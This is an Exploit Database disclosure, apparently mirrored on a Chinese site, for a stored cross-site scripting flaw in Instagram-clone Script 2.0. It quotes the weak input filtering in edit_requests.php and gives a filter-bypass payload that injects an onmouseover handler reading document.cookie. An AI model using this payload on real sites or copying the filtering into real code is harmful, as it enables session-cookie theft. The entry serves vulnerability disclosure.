Instagram-Clone Script 2.0 – Cross-Site Scripting

• Exploit Database
• 21 阅读

• 作者： L0RD
  日期： 2018-07-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/45003/

• # Exploit Title: Instagram-clone Script 2.0 - Cross-Site Scripting
  # Date: 2018-07-10
  # Exploit Author: L0RD
  # Vendor Homepage: https://github.com/yTakkar/Instagram-clone
  # Version: 2.0
  # CVE: CVE-2018-13849
  # Tested on: Kali linux
  
  # POC : Persistent Cross site scripting :
  # vulnerable file : edit_requests.php
  # vulnerable code :
  
  if (isset($_POST['username'])) {
  $username = preg_replace("#[<> ]#i", "", $_POST['username']);
  $firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']);
  $surname = preg_replace("#[<> ]#i", "", $_POST['surname']);
  $bio = preg_replace("#[<>]#i", "", $_POST['bio']);
  $instagram = preg_replace("#[<>]#i", "", $_POST['instagram']);
  $youtube = preg_replace("#[<>]#i", "", $_POST['youtube']);
  $facebook = preg_replace("#[<>]#i", "", $_POST['facebook']);
  $twitter = preg_replace("#[<>]#i", "", $_POST['twitter']);
  $website = preg_replace("#[<>]#i", "", $_POST['website']);
  $mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']);
  $tags = preg_replace("#[\s]#", "-", $_POST['tags']);
   $session = $_SESSION['id'];
  
  $m=$edit->saveProfileEditing($username, $firstname, $surname, $bio,
  $instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags);
  $array = array("mssg" => $m);
  echo json_encode($array);
  }
  
  # We use this payload to bypass filter :
  # Payload : 
  
  "onmouseover=" alert(document.cookie)